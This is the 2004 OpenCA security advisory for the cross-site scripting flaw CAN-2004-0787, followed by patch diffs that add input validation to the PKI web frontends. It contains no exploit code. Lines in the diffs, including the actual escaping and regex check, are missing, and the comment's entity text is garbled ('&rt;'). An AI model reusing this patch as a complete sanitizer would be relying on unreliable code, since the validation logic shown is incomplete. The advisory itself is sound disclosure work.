1 OpenCA Security Advisory: Cross Site Scripting vulnerability
4 Martin Bartosch <mb-bugtraq@cynops.de>
5 Michael Bell <michael.bell@cms.hu-berlin.de>
7 2004-09-01 Initial revision
8 2004-09-06 Public release
13 The OpenCA Project is a collaborative effort to develop a robust,
14 full-featured and Open Source out-of-the-box Certification Authority
15 implementing the most used protocols with full-strength cryptography
16 world-wide. OpenCA is based on many Open-Source Projects. Among the
17 supported software is OpenLDAP, OpenSSL, Apache Project, Apache mod_ssl.
19 A Cross Site Scripting (XSS) vulnerability was found in the OpenCA PKI
20 software, allowing users of the system to inject malicious HTML
21 code into the system. The malicious code may even affect offline
28 All versions of OpenCA, including 0.9.1-8 and 0.9.2 RC6.
34 Form input to the web frontends is not properly validated, making it
35 possible to inject malicious HTML code into the system. Once the
36 offending code has been inserted into the system, it may affect
37 PKI staff or other users accessing the data.
39 OpenCA advocates the separation between individual frontends and the
40 use of an offline CA and RA. In this case data is exchanged using
41 a removable medium such as a floppy disk. The offending code embedded
42 in the user data may thus be transferred even to systems not connected
43 to a network and might be used to attack offline nodes.
49 Cross site scripting attacks primarily affect the client system
50 running the browser used to display the web page. OpenCA itself is
51 not directly affected by such attacks. However, XSS exploit
52 code may be deployed e. g. in order to gain session credentials,
53 allowing for session takeover. More advanced attacks (requiring
54 specially crafted exploit code) could even be targeted at manipulating
55 data on the OpenCA node on the user's behalf.
61 All users of OpenCA should upgrade to a version that is not affected
64 OpenCA version 0.9.1 users are encouraged to upgrade to version 0.9.1-9.
65 Users of the current development branch 0.9.2 should upgrade to CVS
73 The Common Vulnerabilities and Exposures project (cve.mitre.org) has
74 assigned the name CAN-2004-0787 to this issue.
76 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0787
78 URL for this Security Advisory:
79 http://www.openca.org/news/CAN-2004-0787.txt
88 ###########################################################################
89 ## Patches against version 0.9.2
90 ###########################################################################
92 Index: src/common/lib/functions/initServer
93 ===================================================================
94 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/initServer,v
95 retrieving revision 1.40
96 diff -u -r1.40 initServer
97 --- src/common/lib/functions/initServer 30 Aug 2004 12:31:53 -0000 1.40
98 +++ src/common/lib/functions/initServer 1 Sep 2004 13:27:27 -0000
100 $query->set_gettext (\&i18nGettext);
103 + ## validate input data
104 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
105 + validateCGIParameters(\$query);
107 ## reinit configuration
108 my $CONFIG = $AUTOCONF {"etc_prefix"}.'/servers/'.$AUTOCONF {"config_prefix"}.'.conf';
109 if( not defined (my $ret = $config->loadCfg( "$CONFIG" )) ) {
110 Index: src/common/lib/functions/misc-utils.lib
111 ===================================================================
112 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/misc-utils.lib,v
113 retrieving revision 1.50
114 diff -u -r1.50 misc-utils.lib
115 --- src/common/lib/functions/misc-utils.lib 26 Aug 2004 14:08:03 -0000 1.50
116 +++ src/common/lib/functions/misc-utils.lib 1 Sep 2004 13:27:27 -0000
121 +# 2004-08-31 Martin Bartosch <m.bartosch@cynops.de>
122 +# clean up CGI parameters
123 +# input: reference to CGI class instance
124 +# This function modifies the object itself
125 +sub validateCGIParameters {
126 + my $queryref = shift;
128 + ## validate input data
129 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
130 + foreach my $param (keys %{$$queryref->Vars}) {
131 + my @values = $$queryref->param($param);
133 + # replace < and > with < and &rt; for all CGI parameters passed
134 + # NOTE/FIXME: unescaping might be necessary when actually
135 + # passing this data to e. g. certificate generation routines
136 + # to prevent literal XML entities in certificate contents
141 + $$queryref->param(-name => $param, -value => @values);
143 + # extra sanity check just to be sure (redundant)
144 + foreach (@values) {
146 + print "Content-type: text/html\n\n";
147 + print "Security violation\n";
161 ###########################################################################
162 ## Patches against version 0.9.1-8
163 ###########################################################################
166 Index: src/common/lib/functions/misc-utils.lib
167 ===================================================================
168 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/misc-utils.lib,v
169 retrieving revision 1.16.2.2
170 diff -u -r1.16.2.2 misc-utils.lib
171 --- src/common/lib/functions/misc-utils.lib 16 Apr 2003 13:24:51 -0000 1.16.2.2
172 +++ src/common/lib/functions/misc-utils.lib 1 Sep 2004 11:49:14 -0000
177 +# 2004-08-31 Martin Bartosch <m.bartosch@cynops.de>
178 +# clean up CGI parameters
179 +# input: reference to CGI class instance
180 +# This function modifies the object itself
181 +sub validateCGIParameters {
182 + my $queryref = shift;
184 + ## validate input data
185 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
186 + foreach my $param (keys %{$$queryref->Vars}) {
187 + my @values = $$queryref->param($param);
189 + # replace < and > with < and &rt; for all CGI parameters passed
190 + # NOTE/FIXME: unescaping might be necessary when actually
191 + # passing this data to e. g. certificate generation routines
192 + # to prevent literal XML entities in certificate contents
197 + $$queryref->param(-name => $param, -value => @values);
199 + # extra sanity check just to be sure (redundant)
200 + foreach (@values) {
202 + print "Content-type: text/html\n\n";
203 + print "Security violation\n";
212 Index: src/web-interfaces/ca/ca.in
213 ===================================================================
214 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ca/ca.in,v
215 retrieving revision 1.8.2.1
216 diff -u -r1.8.2.1 ca.in
217 --- src/web-interfaces/ca/ca.in 10 Nov 2003 13:10:48 -0000 1.8.2.1
218 +++ src/web-interfaces/ca/ca.in 1 Sep 2004 11:49:16 -0000
220 ##// Now it's time to get the parameters passed over the web
221 $query = new OpenCA::TRIStateCGI;
223 +## validate input parameters
224 +validateCGIParameters(\$query);
226 ## Generate a new reference to Configuration ( instance )
227 $dbconfig = new OpenCA::Configuration;
228 $dbiconfig = new OpenCA::Configuration;
229 Index: src/web-interfaces/ldap/ldap.in
230 ===================================================================
231 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ldap/ldap.in,v
232 retrieving revision 1.7.2.1
233 diff -u -r1.7.2.1 ldap.in
234 --- src/web-interfaces/ldap/ldap.in 10 Nov 2003 13:10:48 -0000 1.7.2.1
235 +++ src/web-interfaces/ldap/ldap.in 1 Sep 2004 11:49:16 -0000
237 ##// Now it's time to get the parameters passed over the web
238 $query = new OpenCA::TRIStateCGI;
240 +## validate input parameters
241 +validateCGIParameters(\$query);
243 ## Generate a new reference to Configuration ( instance )
244 $dbconfig = new OpenCA::Configuration;
245 $dbiconfig = new OpenCA::Configuration;
246 Index: src/web-interfaces/node/node.in
247 ===================================================================
248 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/node/node.in,v
249 retrieving revision 1.2.2.1
250 diff -u -r1.2.2.1 node.in
251 --- src/web-interfaces/node/node.in 10 Nov 2003 13:10:48 -0000 1.2.2.1
252 +++ src/web-interfaces/node/node.in 1 Sep 2004 11:49:17 -0000
254 ##// Now it's time to get the parameters passed over the web
255 $query = new OpenCA::TRIStateCGI;
257 +## validate input parameters
258 +validateCGIParameters(\$query);
260 ## Generate a new reference to Configuration ( instance )
261 $dbconfig = new OpenCA::Configuration;
262 $dbiconfig = new OpenCA::Configuration;
263 Index: src/web-interfaces/pub/pki.in
264 ===================================================================
265 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/pub/pki.in,v
266 retrieving revision 1.7.2.1
267 diff -u -r1.7.2.1 pki.in
268 --- src/web-interfaces/pub/pki.in 10 Nov 2003 13:10:48 -0000 1.7.2.1
269 +++ src/web-interfaces/pub/pki.in 1 Sep 2004 11:49:17 -0000
271 ##// Now it's time to get the parameters passed over the web
272 $query = new OpenCA::TRIStateCGI;
274 +## validate input parameters
275 +validateCGIParameters(\$query);
277 ## Generate a new reference to Configuration ( instance )
278 $dbconfig = new OpenCA::Configuration;
279 $dbiconfig = new OpenCA::Configuration;
280 Index: src/web-interfaces/pub/scepd.in
281 ===================================================================
282 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/pub/Attic/scepd.in,v
283 retrieving revision 1.2.2.1
284 diff -u -r1.2.2.1 scepd.in
285 --- src/web-interfaces/pub/scepd.in 10 Nov 2003 13:10:48 -0000 1.2.2.1
286 +++ src/web-interfaces/pub/scepd.in 1 Sep 2004 11:49:17 -0000
288 ##// Now it's time to get the parameters passed over the web
289 $query = new OpenCA::TRIStateCGI;
291 +## validate input parameters
292 +validateCGIParameters(\$query);
294 ## Generate a new reference to Configuration ( instance )
295 $dbconfig = new OpenCA::Configuration;
296 $dbiconfig = new OpenCA::Configuration;
297 Index: src/web-interfaces/ra/RAServer.in
298 ===================================================================
299 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ra/RAServer.in,v
300 retrieving revision 1.8.2.1
301 diff -u -r1.8.2.1 RAServer.in
302 --- src/web-interfaces/ra/RAServer.in 10 Nov 2003 13:10:49 -0000 1.8.2.1
303 +++ src/web-interfaces/ra/RAServer.in 1 Sep 2004 11:49:18 -0000
305 ##// Now it's time to get the parameters passed over the web
306 $query = new OpenCA::TRIStateCGI;
308 +## validate input parameters
309 +validateCGIParameters(\$query);
311 ## Generate a new reference to Configuration ( instance )
312 $dbconfig = new OpenCA::Configuration;
313 $dbiconfig = new OpenCA::Configuration;